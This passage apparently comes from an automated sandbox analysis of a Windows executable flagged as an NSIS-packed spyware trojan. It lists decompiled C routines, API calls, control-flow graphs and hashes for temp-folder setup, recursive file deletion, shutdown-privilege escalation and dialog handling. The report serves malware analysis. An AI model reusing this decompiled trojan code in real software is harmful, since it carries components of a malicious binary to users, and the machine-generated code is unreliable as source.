            										_t254 = _t175;
            										if(_t175 == 0) {
            											goto L68;
            										}
            										goto L40;
            									}
            									goto L31;
            								}
            								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
            								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
            									goto L29;
            								}
            								_t177 =  *((intOrPtr*)(_t198 + 8));
            								__eflags = _t177 - 0x20;
            								if(_t177 == 0x20) {
            									L28:
            									_t36 =  &_v20;
            									 *_t36 = _v20 | 0x00000004;
            									__eflags =  *_t36;
            									goto L29;
            								}
            								__eflags = _t177 - _t188;
            								if(_t177 != _t188) {
            									goto L29;
            								}
            								goto L28;
            							}
            							_t178 =  *((intOrPtr*)(_t198 + 2));
            							__eflags = _t178 - _t209;
            							if(_t178 == _t209) {
            								L23:
            								 *0x7a8b40 = 1;
            								goto L24;
            							}
            							__eflags = _t178 - _t188;
            							if(_t178 != _t188) {
            								goto L24;
            							}
            							goto L23;
            						}
            					} else {
            						goto L16;
            					}
            					do {
            						L16:
            						_t198 = _t198 + 2;
            						__eflags =  *_t198 - _t209;
            					} while ( *_t198 == _t209);
            					goto L17;
            				}
            				goto L37;
            			}



















































            0x00403654
            0x00403655
            0x0040365c
            0x0040365f
            0x00403666
            0x00403669
            0x0040367c
            0x00403682
            0x00403685
            0x00403688
            0x00403696
            0x0040369e
            0x004036a9
            0x004036c2
            0x004036c4
            0x004036cc
            0x004036cc
            0x004036d7
            0x004036d9
            0x004036d9
            0x004036ee
            0x00403713
            0x00403721
            0x00403724
            0x0040372b
            0x00403732
            0x00403732
            0x0040372b
            0x00403734
            0x00403739
            0x0040373a
            0x00403746
            0x0040374a
            0x00403751
            0x0040375f
            0x00403764
            0x0040376b
            0x0040376f
            0x00403773
            0x00403775
            0x00403775
            0x00403773
            0x0040377c
            0x00403783
            0x00403789
            0x004037a1
            0x004037b1
            0x004037b6
            0x004037bc
            0x004037c3
            0x004037ca
            0x004037cc
            0x004037cd
            0x004037d7
            0x004037de
            0x004037e0
            0x004037e2
            0x004037e2
            0x004037f5
            0x004037f7
            0x004038f1
            0x004038f1
            0x004038f4
            0x004038f7
            0x00000000
            0x00000000
            0x00403801
            0x00403802
            0x00403805
            0x0040380e
            0x0040380e
            0x00403811
            0x00403814
            0x00403817
            0x0040381a
            0x0040381a
            0x0040381a
            0x0040381b
            0x0040381f
            0x004038df
            0x004038e8
            0x004038ea
            0x004038ed
            0x004038f0
            0x004038f0
            0x004038f0
            0x00000000
            0x00403825
            0x00403826
            0x00403827
            0x0040382b
            0x00403845
            0x0040384c
            0x0040385f
            0x00403860
            0x00403875
            0x0040387a
            0x0040387c
            0x0040387e
            0x0040389a
            0x004038a1
            0x004038b4
            0x004038b5
            0x004038ca
            0x004038d0
            0x004038d2
            0x004038d4
            0x004038dc
            0x004038de
            0x00000000
            0x004038de
            0x004038d8
            0x004038da
            0x004038ff
            0x00403903
            0x0040390c
            0x00403911
            0x00403917
            0x00403922
            0x00403924
            0x00403929
            0x0040392b
            0x00403983
            0x00403988
            0x00403991
            0x00403998
            0x0040399b
            0x00403b72
            0x00403b72
            0x00403b77
            0x00403b80
            0x00403b9d
            0x00403c15
            0x00403c15
            0x00403c1d
            0x00403c1f
            0x00403c1f
            0x00403c25
            0x00403c25
            0x00403bb4
            0x00403bc0
            0x00403bd1
            0x00403bd8
            0x00403bdf
            0x00403bdf
            0x00403be7
            0x00403bf3
            0x00403c01
            0x00403c0c
            0x00000000
            0x00000000
            0x00000000
            0x00403bf5
            0x00403bf5
            0x00403bf6
            0x00403bf8
            0x00403bf9
            0x00403bfa
            0x00403bff
            0x00403c0e
            0x00403c10
            0x00000000
            0x00403c10
            0x00000000
            0x00403bff
            0x00403bf3
            0x00403b8a
            0x00403b91
            0x00403b91
            0x004039a7
            0x00403a4e
            0x00403a4e
            0x00403a5a
            0x00000000
            0x00403a5a
            0x004039b8
            0x004039c0
            0x00403a12
            0x00403a12
            0x00403a18
            0x00403a1f
            0x00403a6d
            0x00403a6f
            0x00403a74
            0x00403a76
            0x00403a7e
            0x00403a7e
            0x00403a89
            0x00403a8e
            0x00403a95
            0x00403a9b
            0x00403a9d
            0x00403b70
            0x00403b70
            0x00403b70
            0x00000000
            0x00403aa3
            0x00403aa3
            0x00403aa5
            0x00403aa6
            0x00403aaf
            0x00403aa8
            0x00403aa8
            0x00403aa8
            0x00403ab5
            0x00403abd
            0x00403ac4
            0x00403acc
            0x00403acc
            0x00403ad9
            0x00403ae5
            0x00403aef
            0x00403aef
            0x00403af1
            0x00403af8
            0x00403b02
            0x00403b0e
            0x00403b14
            0x00403b1a
            0x00403b1d
            0x00403b27
            0x00403b2d
            0x00403b2f
            0x00403b33
            0x00403b44
            0x00403b4a
            0x00403b4f
            0x00403b51
            0x00403b54
            0x00403b5a
            0x00403b5a
            0x00403b51
            0x00403b2f
            0x00403b5d
            0x00403b64
            0x00403b64
            0x00403b64
            0x00403b64
            0x00403b6b
            0x00000000
            0x00403b6b
            0x00403a9d
            0x00403a21
            0x00403a24
            0x00403a28
            0x00403a2d
            0x00403a2f
            0x00000000
            0x00000000
            0x00403a3b
            0x00403a46
            0x00403a4b
            0x00000000
            0x00403a4b
            0x004039c9
            0x004039e1
            0x004039f2
            0x004039f3
            0x004039f7
            0x004039f9
            0x00403a07
            0x00403a0e
            0x00000000
            0x00000000
            0x00000000
            0x00403a0e
            0x00403a10
            0x00000000
            0x00403a10
            0x00403933
            0x0040393f
            0x00403944
            0x00403949
            0x0040394b
            0x00000000
            0x00000000
            0x00403953
            0x0040395b
            0x0040396c
            0x00403974
            0x00403976
            0x0040397b
            0x0040397d
            0x00000000
            0x00000000
            0x00000000
            0x0040397d
            0x00000000
            0x004038da
            0x00403883
            0x00403885
            0x00000000
            0x00000000
            0x00403887
            0x0040388b
            0x0040388f
            0x00403896
            0x00403896
            0x00403896
            0x00403896
            0x00000000
            0x00403896
            0x00403891
            0x00403894
            0x00000000
            0x00000000
            0x00000000
            0x00403894
            0x0040382d
            0x00403831
            0x00403834
            0x0040383b
            0x0040383b
            0x00000000
            0x0040383b
            0x00403836
            0x00403839
            0x00000000
            0x00000000
            0x00000000
            0x00403839
            0x00000000
            0x00000000
            0x00000000
            0x00403807
            0x00403807
            0x00403808
            0x00403809
            0x00403809
            0x00000000
            0x00403807
            0x00000000

            APIs
            • SetErrorMode.KERNELBASE(00008001), ref: 00403669
            • GetVersionExW.KERNEL32(?), ref: 00403692
            • GetVersionExW.KERNEL32(0000011C), ref: 004036A9
            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
            • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
            • OleInitialize.OLE32(00000000), ref: 00403783
            • SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
            • GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe" ,00000000), ref: 004037EF
            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403922
            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040393F
            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403953
            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040395B
            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
            • DeleteFileW.KERNELBASE(1033), ref: 00403988
            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A6F
            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A7E
              • Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A89
            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe" ,00000000,?), ref: 00403A95
            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
            • DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
            • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,0079F748,00000001), ref: 00403B27
            • CloseHandle.KERNEL32(00000000,0079F748,0079F748,?,0079F748,00000000), ref: 00403B54
            • ExitProcess.KERNEL32(?), ref: 00403B72
            • OleUninitialize.OLE32(?), ref: 00403B77
            • ExitProcess.KERNEL32 ref: 00403B91
            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
            • OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
            • ExitWindowsEx.USER32 ref: 00403C04
            • ExitProcess.KERNEL32 ref: 00403C25
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
            • API String ID: 2292928366-1317801814
            • Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
            • Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
            • Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
            • Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 390 405d7a-405da0 call 406045 393 405da2-405db4 DeleteFileW 390->393 394 405db9-405dc0 390->394 395 405f36-405f3a 393->395 396 405dc2-405dc4 394->396 397 405dd3-405de3 call 40666e 394->397 399 405ee4-405ee9 396->399 400 405dca-405dcd 396->400 403 405df2-405df3 call 405f89 397->403 404 405de5-405df0 lstrcatW 397->404 399->395 402 405eeb-405eee 399->402 400->397 400->399 405 405ef0-405ef6 402->405 406 405ef8-405f00 call 4069a4 402->406 407 405df8-405dfc 403->407 404->407 405->395 406->395 414 405f02-405f16 call 405f3d call 405d32 406->414 410 405e08-405e0e lstrcatW 407->410 411 405dfe-405e06 407->411 413 405e13-405e2f lstrlenW FindFirstFileW 410->413 411->410 411->413 415 405e35-405e3d 413->415 416 405ed9-405edd 413->416 432 405f18-405f1b 414->432 433 405f2e-405f31 call 4056d0 414->433 419 405e5d-405e71 call 40666e 415->419 420 405e3f-405e47 415->420 416->399 418 405edf 416->418 418->399 430 405e73-405e7b 419->430 431 405e88-405e93 call 405d32 419->431 422 405e49-405e51 420->422 423 405ebc-405ecc FindNextFileW 420->423 422->419 427 405e53-405e5b 422->427 423->415 426 405ed2-405ed3 FindClose 423->426 426->416 427->419 427->423 430->423 435 405e7d-405e86 call 405d7a 430->435 443 405eb4-405eb7 call 4056d0 431->443 444 405e95-405e98 431->444 432->405 434 405f1d-405f2c call 4056d0 call 40642e 432->434 433->395 434->395 435->423 443->423 446 405e9a-405eaa call 4056d0 call 40642e 444->446 447 405eac-405eb2 444->447 446->423 447->423
            C-Code - Quality: 98%
            			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
            				signed int _v8;
            				signed int _v12;
            				short _v556;
            				short _v558;
            				struct _WIN32_FIND_DATAW _v604;
            				signed int _t38;
            				signed int _t52;
            				signed int _t55;
            				signed int _t62;
            				void* _t64;
            				signed char _t65;
            				WCHAR* _t66;
            				void* _t67;
            				WCHAR* _t68;
            				void* _t70;
            
            				_t65 = _a8;
            				_t68 = _a4;
            				_v8 = _t65 & 0x00000004;
            				_t38 = E00406045(__eflags, _t68);
            				_v12 = _t38;
            				if((_t65 & 0x00000008) != 0) {
            					_t62 = DeleteFileW(_t68); // executed
            					asm("sbb eax, eax");
            					_t64 =  ~_t62 + 1;
            					 *0x7a8b28 =  *0x7a8b28 + _t64;
            					return _t64;
            				}
            				_a4 = _t65;
            				_t8 =  &_a4;
            				 *_t8 = _a4 & 0x00000001;
            				__eflags =  *_t8;
            				if( *_t8 == 0) {
            					L5:
            					E0040666E(0x7a3f90, _t68);
            					__eflags = _a4;
            					if(_a4 == 0) {
            						E00405F89(_t68);
            					} else {
            						lstrcatW(0x7a3f90, L"\\*.*");
            					}
            					__eflags =  *_t68;
            					if( *_t68 != 0) {
            						L10:
            						lstrcatW(_t68, 0x40a014);
            						L11:
            						_t66 =  &(_t68[lstrlenW(_t68)]);
            						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
            						_t70 = _t38;
            						__eflags = _t70 - 0xffffffff;
            						if(_t70 == 0xffffffff) {
            							L26:
            							__eflags = _a4;
            							if(_a4 != 0) {
            								_t30 = _t66 - 2;
            								 *_t30 =  *(_t66 - 2) & 0x00000000;
            								__eflags =  *_t30;
            							}
            							goto L28;
            						} else {
            							goto L12;
            						}
            						do {
            							L12:
            							__eflags = _v604.cFileName - 0x2e;
            							if(_v604.cFileName != 0x2e) {
            								L16:
            								E0040666E(_t66,  &(_v604.cFileName));
            								__eflags = _v604.dwFileAttributes & 0x00000010;
            								if(__eflags == 0) {
            									_t52 = E00405D32(__eflags, _t68, _v8);
            									__eflags = _t52;
            									if(_t52 != 0) {
            										E004056D0(0xfffffff2, _t68);
            									} else {
            										__eflags = _v8 - _t52;
            										if(_v8 == _t52) {
            											 *0x7a8b28 =  *0x7a8b28 + 1;
            										} else {
            											E004056D0(0xfffffff1, _t68);
            											E0040642E(_t67, _t68, 0);
            										}
            									}
            								} else {
            									__eflags = (_a8 & 0x00000003) - 3;
            									if(__eflags == 0) {
            										E00405D7A(__eflags, _t68, _a8);
            									}
            								}
            								goto L24;
            							}
            							__eflags = _v558;
            							if(_v558 == 0) {
            								goto L24;
            							}
            							__eflags = _v558 - 0x2e;
            							if(_v558 != 0x2e) {
            								goto L16;
            							}
            							__eflags = _v556;
            							if(_v556 == 0) {
            								goto L24;
            							}
            							goto L16;
            							L24:
            							_t55 = FindNextFileW(_t70,  &_v604); // executed
            							__eflags = _t55;
            						} while (_t55 != 0);
            						_t38 = FindClose(_t70); // executed
            						goto L26;
            					}
            					__eflags =  *0x7a3f90 - 0x5c;
            					if( *0x7a3f90 != 0x5c) {
            						goto L11;
            					}
            					goto L10;
            				} else {
            					__eflags = _t38;
            					if(_t38 == 0) {
            						L28:
            						__eflags = _a4;
            						if(_a4 == 0) {
            							L36:
            							return _t38;
            						}
            						__eflags = _v12;
            						if(_v12 != 0) {
            							_t38 = E004069A4(_t68);
            							__eflags = _t38;
            							if(_t38 == 0) {
            								goto L36;
            							}
            							E00405F3D(_t68);
            							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
            							__eflags = _t38;
            							if(_t38 != 0) {
            								return E004056D0(0xffffffe5, _t68);
            							}
            							__eflags = _v8;
            							if(_v8 == 0) {
            								goto L30;
            							}
            							E004056D0(0xfffffff1, _t68);
            							return E0040642E(_t67, _t68, 0);
            						}
            						L30:
            						 *0x7a8b28 =  *0x7a8b28 + 1;
            						return _t38;
            					}
            					__eflags = _t65 & 0x00000002;
            					if((_t65 & 0x00000002) == 0) {
            						goto L28;
            					}
            					goto L5;
            				}
            			}


















            0x00405d84
            0x00405d89
            0x00405d92
            0x00405d95
            0x00405d9d
            0x00405da0
            0x00405da3
            0x00405dab
            0x00405dad
            0x00405dae
            0x00000000
            0x00405dae
            0x00405db9
            0x00405dbc
            0x00405dbc
            0x00405dbc
            0x00405dc0
            0x00405dd3
            0x00405dda
            0x00405ddf
            0x00405de3
            0x00405df3
            0x00405de5
            0x00405deb
            0x00405deb
            0x00405df8
            0x00405dfc
            0x00405e08
            0x00405e0e
            0x00405e13
            0x00405e19
            0x00405e24
            0x00405e2a
            0x00405e2c
            0x00405e2f
            0x00405ed9
            0x00405ed9
            0x00405edd
            0x00405edf
            0x00405edf
            0x00405edf
            0x00405edf
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00405e35
            0x00405e35
            0x00405e35
            0x00405e3d
            0x00405e5d
            0x00405e65
            0x00405e6a
            0x00405e71
            0x00405e8c
            0x00405e91
            0x00405e93
            0x00405eb7
            0x00405e95
            0x00405e95
            0x00405e98
            0x00405eac
            0x00405e9a
            0x00405e9d
            0x00405ea5
            0x00405ea5
            0x00405e98
            0x00405e73
            0x00405e79
            0x00405e7b
            0x00405e81
            0x00405e81
            0x00405e7b
            0x00000000
            0x00405e71
            0x00405e3f
            0x00405e47
            0x00000000
            0x00000000
            0x00405e49
            0x00405e51
            0x00000000
            0x00000000
            0x00405e53
            0x00405e5b
            0x00000000
            0x00000000
            0x00000000
            0x00405ebc
            0x00405ec4
            0x00405eca
            0x00405eca
            0x00405ed3
            0x00000000
            0x00405ed3
            0x00405dfe
            0x00405e06
            0x00000000
            0x00000000
            0x00000000
            0x00405dc2
            0x00405dc2
            0x00405dc4
            0x00405ee4
            0x00405ee6
            0x00405ee9
            0x00405f3a
            0x00405f3a
            0x00405f3a
            0x00405eeb
            0x00405eee
            0x00405ef9
            0x00405efe
            0x00405f00
            0x00000000
            0x00000000
            0x00405f03
            0x00405f0f
            0x00405f14
            0x00405f16
            0x00000000
            0x00405f31
            0x00405f18
            0x00405f1b
            0x00000000
            0x00000000
            0x00405f20
            0x00000000
            0x00405f27
            0x00405ef0
            0x00405ef0
            0x00000000
            0x00405ef0
            0x00405dca
            0x00405dcd
            0x00000000
            0x00000000
            0x00000000
            0x00405dcd

            APIs
            • DeleteFileW.KERNELBASE(?,?,76CDFAA0,76CDF560,00000000), ref: 00405DA3
            • lstrcatW.KERNEL32(007A3F90,\*.*), ref: 00405DEB
            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E0E
            • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,76CDFAA0,76CDF560,00000000), ref: 00405E14
            • FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,76CDFAA0,76CDF560,00000000), ref: 00405E24
            • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
            • FindClose.KERNELBASE(00000000), ref: 00405ED3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
            • String ID: .$.$\*.*
            • API String ID: 2035342205-3749113046
            • Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
            • Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
            • Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
            • Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004069A4(WCHAR* _a4) {
            				void* _t2;
            
            				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
            				if(_t2 == 0xffffffff) {
            					return 0;
            				}
            				FindClose(_t2);
            				return 0x7a4fd8;
            			}




            0x004069af
            0x004069b8
            0x00000000
            0x004069c5
            0x004069bb
            0x00000000

            APIs
            • FindFirstFileW.KERNELBASE(76CDFAA0,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560), ref: 004069AF
            • FindClose.KERNEL32(00000000), ref: 004069BB
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: Find$CloseFileFirst
            • String ID:
            • API String ID: 2295610775-0
            • Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
            • Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
            • Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
            • Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 141 4040cb-4040dd 142 4040e3-4040e9 141->142 143 404244-404253 141->143 142->143 144 4040ef-4040f8 142->144 145 4042a2-4042b7 143->145 146 404255-404290 GetDlgItem * 2 call 4045ca KiUserCallbackDispatcher call 40140b 143->146 150 4040fa-404107 SetWindowPos 144->150 151 40410d-404114 144->151 148 4042f7-4042fc call 404616 145->148 149 4042b9-4042bc 145->149 167 404295-40429d 146->167 163 404301-40431c 148->163 153 4042be-4042c9 call 401389 149->153 154 4042ef-4042f1 149->154 150->151 156 404116-404130 ShowWindow 151->156 157 404158-40415e 151->157 153->154 180 4042cb-4042ea SendMessageW 153->180 154->148 162 404597 154->162 164 404231-40423f call 404631 156->164 165 404136-404149 GetWindowLongW 156->165 159 404160-404172 DestroyWindow 157->159 160 404177-40417a 157->160 168 404574-40457a 159->168 170 40417c-404188 SetWindowLongW 160->170 171 40418d-404193 160->171 169 404599-4045a0 162->169 174 404325-40432b 163->174 175 40431e-404320 call 40140b 163->175 164->169 165->164 166 40414f-404152 ShowWindow 165->166 166->157 167->145 168->162 176 40457c-404582 168->176 170->169 171->164 179 404199-4041a8 GetDlgItem 171->179 177 404331-40433c 174->177 178 404555-40456e DestroyWindow EndDialog 174->178 175->174 176->162 183 404584-40458d ShowWindow 176->183 177->178 184 404342-40438f call 4066ab call 4045ca * 3 GetDlgItem 177->184 178->168 185 4041c7-4041ca 179->185 186 4041aa-4041c1 SendMessageW IsWindowEnabled 179->186 180->169 183->162 213 404391-404396 184->213 214 404399-4043d5 ShowWindow EnableWindow call 4045ec EnableWindow 184->214 188 4041cc-4041cd 185->188 189 4041cf-4041d2 185->189 186->162 186->185 191 4041fd-404202 call 4045a3 188->191 192 4041e0-4041e5 189->192 193 4041d4-4041da 189->193 191->164 196 40421b-40422b SendMessageW 192->196 198 4041e7-4041ed 192->198 193->196 197 4041dc-4041de 193->197 196->164 197->191 201 404204-40420d call 40140b 198->201 202 4041ef-4041f5 call 40140b 198->202 201->164 211 40420f-404219 201->211 209 4041fb 202->209 209->191 211->209 213->214 217 4043d7-4043d8 214->217 218 4043da 214->218 219 4043dc-40440a GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 40440c-40441d SendMessageW 219->220 221 40441f 219->221 222 404425-404464 call 4045ff call 4040ac call 40666e lstrlenW call 4066ab SetWindowTextW call 401389 220->222 221->222 222->163 233 40446a-40446c 222->233 233->163 234 404472-404476 233->234 235 404495-4044a9 DestroyWindow 234->235 236 404478-40447e 234->236 235->168 238 4044af-4044dc CreateDialogParamW 235->238 236->162 237 404484-40448a 236->237 237->163 239 404490 237->239 238->168 240 4044e2-404539 call 4045ca GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 40453b-404553 ShowWindow call 404616 240->245 245->168
            C-Code - Quality: 84%
            			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
            				struct HWND__* _v28;
            				void* _v84;
            				void* _v88;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				signed int _t34;
            				signed int _t36;
            				signed int _t38;
            				struct HWND__* _t48;
            				signed int _t67;
            				struct HWND__* _t73;
            				signed int _t86;
            				struct HWND__* _t91;
            				signed int _t99;
            				int _t103;
            				signed int _t117;
            				int _t118;
            				int _t122;
            				signed int _t124;
            				struct HWND__* _t127;
            				struct HWND__* _t128;
            				int _t129;
            				intOrPtr _t130;
            				long _t133;
            				int _t135;
            				int _t136;
            				void* _t137;
            
            				_t130 = _a8;
            				if(_t130 == 0x110 || _t130 == 0x408) {
            					_t34 = _a12;
            					_t127 = _a4;
